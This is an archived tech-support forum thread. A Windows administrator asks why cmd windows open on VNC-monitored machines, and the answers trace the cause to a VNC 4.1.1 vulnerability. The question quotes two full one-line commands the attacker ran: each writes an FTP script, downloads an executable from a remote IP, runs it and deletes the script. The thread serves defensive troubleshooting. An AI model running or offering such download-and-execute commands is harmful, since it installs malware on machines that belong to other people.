Solved

cmd opens, runs ftp command and closes

Posted on 2006-11-30
5
525 Views
Last Modified: 2008-01-09
hi all

I have some wxpSP2/W2003Server boxes being watch with VNC, watching what they are doing.   sometimes they open a cmd window with the following commands

cmd.exe /c del i&echo open 10.200.17.43 18766 > i&echo user 1 1 >> i &echo get 674.exe >> i &echo quit >> i &ftp -n -s:i &674.exe&del i&exit
cmd.exe /c del i&echo open 10.200.27.43 8196 > i&echo user 1 1 >> i &echo get 072.exe >> i &echo quit >> i &ftp -n -s:i &072.exe&del i&exit

ive seen this in some other computers, with virus, sometimes i see it trying to download other exe names.

i've already  avg-adaware-spybot-regedit-systedit'ED  those boxes and nothing strange came out,

i took a photo of the process list after and before and the only different thing is CMD run supossedly by me.

i ve seen this in some other computers and im sure im not the only one.

any ideas ?

I hate xp, how can someone run something on a computer that does not have nothing to do with internet ?   the only thing that is internet related in that box is antivirus updating.  

I HATE XP ZILLION Vulnerabilities.


0
Comment
Question by:HTorres
  • 2
  • 2
5 Comments
 
LVL 4

Author Comment

by:HTorres
Comment Utility
Thanks in advance all
0
 
LVL 69

Expert Comment

by:Merete
Comment Utility
These days anything is possible I would be concerned with too, any staff clients trying to hack into the system?
Here is two great tools from systernals
process explorer may assist you
Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.
http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx

RegMon for Windows v7.04
http://www.microsoft.com/technet/sysinternals/utilities/regmon.mspx

All Systernal tools
http://www.microsoft.com/technet/sysinternals/default.mspx

Active Ports is another great little tool it will show which ports are active and you can queiry it and even stop them.
http://www.download.com/3000-2085-10062969.html

Hope they bring some light to this issue
Merete
0
 
LVL 11

Accepted Solution

by:
ch2 earned 250 total points
Comment Utility
This is a vulnerability of the VNC.

This PAQ: http:Q_22047347.html
0
 
LVL 4

Author Comment

by:HTorres
Comment Utility
Merete, great links
thank you!

--

Ch2, that was it!!!

Ive noticed that this thing only happened in vnc411, the other computers where we have vnc412 are without incidents.

One thing came to my mind.  my ISP is a moron and they have all ports closed (they even tried to close port 25) ... so i can connect from here to other computers via internet, but i cannot connect (from there) to our computers here
How can someone could enter here and exploit a vulnerability and I cannot connect ?

i will take a look at activeports

what port they are using?

0
 
LVL 69

Expert Comment

by:Merete
Comment Utility
thanks glad you like them  
0

Featured Post

Comprehensive Backup Solutions for Microsoft

Acronis protects the complete Microsoft technology stack: Windows Server, Windows PC, laptop and Surface data; Microsoft business applications; Microsoft Hyper-V; Azure VMs; Microsoft Windows Server 2016; Microsoft Exchange 2016 and SQL Server 2016.

Join & Write a Comment

If you build your web application in Visual Studio you'll get at least a few binaries, or .DLL, files in your bin folder. However, there is more compiling to be done. Normally this would happen when an ASP.NET resource within the web site is request…
cPanel is a Unix based web hosting control panel that provides a graphical interface and automation tools designed to simplify the process of hosting a web site. cPanel utilizes a 3 tier structure that provides functionality for administrators, rese…
In this seventh video of the Xpdf series, we discuss and demonstrate the PDFfonts utility, which lists all the fonts used in a PDF file. It does this via a command line interface, making it suitable for use in programs, scripts, batch files — any pl…
This video gives you a great overview about bandwidth monitoring with SNMP and WMI with our network monitoring solution PRTG Network Monitor (https://www.paessler.com/prtg). If you're looking for how to monitor bandwidth using netflow or packet s…

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now